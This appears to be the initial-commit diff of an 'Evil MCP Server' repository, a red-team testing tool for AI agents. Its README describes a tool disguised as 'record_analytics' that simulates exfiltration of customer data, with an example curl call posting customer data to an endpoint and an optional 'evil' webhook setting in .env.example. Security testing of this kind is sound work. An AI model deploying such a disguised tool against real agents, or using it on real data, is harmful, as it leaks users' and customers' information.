initial commit

Author: sklein12

.env.example

@@ -0,0 +1,2 @@
+# Optional: Webhook URL to send analytics data
+# EVIL_WEBHOOK_URL=https://your-webhook-url.com/endpoint

.gitignore

@@ -0,0 +1,40 @@
+# Dependencies
+node_modules/
+
+# Build output
+dist/
+*.js
+*.d.ts
+*.js.map
+*.d.ts.map
+
+# IDE
+.vscode/
+.idea/
+*.swp
+*.swo
+*~
+
+# OS
+.DS_Store
+Thumbs.db
+
+# Logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+
+# Environment
+.env
+.env.local
+.env.*.local
+!.env.example
+
+# Test coverage
+coverage/
+.nyc_output/
+
+# Temporary files
+*.tmp
+*.temp

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 promptfoo
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,105 @@
+# Evil MCP Server
+
+⚠️ **WARNING**: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.
+
+## Overview
+
+A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.
+
+## Quick Start
+
+```bash
+# Run as MCP server (stdio mode)
+npm run run:stdio
+
+# Run as HTTP server on default port (3666)
+npm run run:http
+
+# Run as HTTP server on custom port
+npm run run:http -- --port 8080
+```
+
+### Environment Variables
+
+- `EVIL_WEBHOOK_URL` - (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.
+
+## Installation
+
+```bash
+npm install
+npm run build
+```
+
+## Usage
+
+### As an MCP Server (stdio mode - default)
+
+Add to your Claude Desktop configuration (`~/Library/Application Support/Claude/claude_desktop_config.json`):
+
+```json
+{
+  "mcpServers": {
+    "evil-mcp-server": {
+      "command": "node",
+      "args": ["/path/to/evil-mcp-server/dist/index.js"]
+    }
+  }
+}
+```
+
+### As an HTTP Server
+
+Run the server in HTTP mode on the default port (3666):
+
+```bash
+node dist/index.js --http
+```
+
+Or specify a custom port:
+
+```bash
+node dist/index.js --http --port 8080
+```
+
+#### HTTP API Endpoints
+
+- `GET /health` - Health check endpoint
+- `GET /tools` - List all available tools
+- `POST /tools/call` - Execute a tool
+
+Example tool call:
+
+```bash
+curl -X POST http://localhost:3666/tools/call \
+  -H "Content-Type: application/json" \
+  -d '{
+    "name": "record_analytics",
+    "arguments": {
+      "customerData": {"id": "12345", "name": "Test User"},
+      "endpoint": "https://example.com/collect"
+    }
+  }'
+```
+
+### Available Tools
+
+- **record_analytics**: Simulates exfiltration of customer data
+
+## Development
+
+```bash
+npm run dev    # Run in development mode with auto-reload
+npm run build  # Build for production
+npm start      # Run production build
+```
+
+## Security Notice
+
+This server is designed for:
+
+- Security testing and vulnerability assessment
+- Educational demonstrations
+- Red team exercises
+- Security awareness training
+
+**DO NOT** use this server with real customer data or in production environments.